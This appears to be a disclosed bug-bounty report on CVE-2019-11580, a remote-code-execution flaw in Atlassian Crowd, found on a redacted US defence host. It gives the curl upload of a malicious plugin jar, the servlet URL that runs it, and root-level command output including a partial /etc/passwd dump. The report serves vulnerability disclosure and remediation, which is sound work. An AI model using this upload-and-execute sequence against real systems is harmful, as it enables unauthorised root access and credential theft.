9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.975 High
EPSS
Percentile
100.0%
Summary:
Atlassian Crowd is a centralized identity management application that allows companies to βManage users from multiple directories - Active Directory, LDAP, OpenLDAP or Microsoft Azure AD - and control application authentication permissions in one single location.β
A DOD installation is vulnerable to a remote code execution vulnerability due to not patching CVE-2019-11580.
Description:
From Atlassianβs public advisory:
> Crowd and Crowd Data Center had the pdkinstall development plugin incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center.
There is no public proof-of-concept for this vulnerability, however, I spent a good amount of time reverse-engineering the βpdkinstallβ plugin and I was able to successfully construct a working exploit.
cd
into the directorycurl -k -H "Content-Type: multipart/content" \
--form "[email protected];type=application/octet-stream" https://βββ/crowd/admin/uploadplugin.action
Youβll see that the malicious plugin is successfully installed:
Installed plugin /opt/atlassian/crowd/apache-tomcat/temp/plugindev-2906099909159442588rce.jar
Now visit https://βββββββ/crowd/plugins/servlet/hackerone-cdl which invokes my malicious plugin. This executes the command whoami
which is the user root
ββββββββββ
contents of /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
ββββββββx:6:0:ββββββββββ/sbin:/sbin/shutdown
ββββββx:7:0:βββββββ/sbin:/sbin/halt
βββββββββx:8:12:βββββ/var/spool/ββββ/sbin/nologin
βββx:10:14:βββ/var/spool/βββββββ/sbin/nologin
ββββββx:11:0:ββββββ/root:/sbin/nologin
ββββββββββx:12:100:βββββββ/usr/ββββ/sbin/nologin
ββββββββββx:13:30:βββββ/var/βββββ/sbin/nologin
ββββx:14:50:FTP User:/var/βββββββ/sbin/nologin
βββββββββx:99:99:Nobody:/:/sbin/nologin
ββββββββββx:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
ββββββββββx:38:38::/etc/ββββββ/sbin/nologin
ββββββββββx:499:76:"Saslauthd user":/var/empty/ββββββββββ/sbin/nologin
ββββββββββx:47:47::/var/spool/mqueue:/sbin/nologin
βββββββx:51:51::/var/spool/mqueue:/sbin/nologin
ββββββββx:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
βββββx:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
ββββββββx:74:74:Privilege-separated SSH:/var/empty/ββββββββ/sbin/nologin
ββββββββx:81:81:System message bus:/:/sbin/nologin
βββββββx:500:500:EC2 Default User:/home/ββββββββ/bin/bash
Crowd or Crowd Data Center from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x)
Crowd or Crowd Data Center from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x)
Crowd or Crowd Data Center from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x)
Crowd or Crowd Data Center from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x)
Crowd or Crowd Data Center from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x)
I recommend updating to the latest version of Atlassian Crowd, but if thatβs not possible, follow mitigation options in the advisory.
Remote code execution on https://βββ. An attacker could exploit this vulnerability to pivot into NIPRNet and gain access to other applications. Since Atlassian Crowd is an Identity management / Single Sign-on application, an attacker could exploit this vulnerability to gain access to any applications using Crowd for sign-ons.
Since this is running as root, an attacker could also easily backdoor the login page and steal credentials.
Thanks,
Corben Leo (@cdl)
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.975 High
EPSS
Percentile
100.0%